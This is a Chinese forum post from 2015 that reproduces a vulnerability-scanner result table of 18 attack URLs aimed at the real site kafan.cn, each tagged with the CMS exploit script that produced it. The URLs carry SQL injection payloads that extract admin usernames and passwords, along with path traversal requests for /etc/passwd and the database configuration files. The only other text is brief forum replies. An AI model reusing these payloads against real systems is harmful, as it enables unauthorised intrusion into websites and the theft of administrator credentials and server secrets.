| ID | 漏洞地址 | 来自脚本 |
| 1 | http://www.kafan.cn/index.php?q=xxoo’union select 1,uname,upass from appcms_admin_list where uid like ‘ | appcms.txt |
| 2 | http://www.kafan.cn/forum.php?mod=attachment&findpost=ss&aid=1 | Discuz.txt |
| 3 | http://www.kafan.cn/home.php?mod=space&uid=4&do=profile | Discuz.txt |
| 4 | http://www.kafan.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x f | espcms.txt |
| 5 | http://www.kafan.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x | espcms.txt |
| 6 | http://www.kafan.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x | espcms.txt |
| 7 | http://www.kafan.cn/api.php?op=ajax_domain&url=/etc/passwd | phpcms.txt |
| 8 | http://www.kafan.cn/api.php?op=ajax_domain&url=caches/configs/system.php | phpcms.txt |
| 9 | http://www.kafan.cn/api.php?op=ajax_domain&url=phpsso_server/caches/configs/uc_config.php | phpcms.txt |
| 10 | http://www.kafan.cn/api.php?op=add_favorite&url=wooyun.in&title=%2527 | phpcms.txt |
| 11 | http://www.kafan.cn/index.php?m=admin&c=index&a=login&pc_hash=MUPmkU | phpcms.txt |
| 12 | http://www.kafan.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php | phpcms.txt |
| 13 | http://www.kafan.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php | phpcms.txt |
| 14 | http://www.kafan.cn/index.php?m=member&c=index&a=register&siteid=1 | phpcms.txt |
| 15 | http://www.kafan.cn/robots.txt | phpcms.txt |
| 16 | http://www.kafan.cn/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a% | phpcms.txt |
| 17 | http://www.kafan.cn/index.php?showbrandid=0′ AND (SELECT 1 FROM (SELECT count( * ) , concat((SELECT concat( 0×23, user, 0x7e,password, 0×23 ) FROM dev_base_admin limit 0,1),floor( rand( 0 ) *2 ))x FROM information_schema.tables GROUP BY x)a)–%20 | phpweb.txt |
| 18 | http://www.kafan.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html | shopex.txt |
[复制链接]
发表于 2015-12-8 21:11:24
发表于 2015-12-10 09:43:32
楼主
不客气。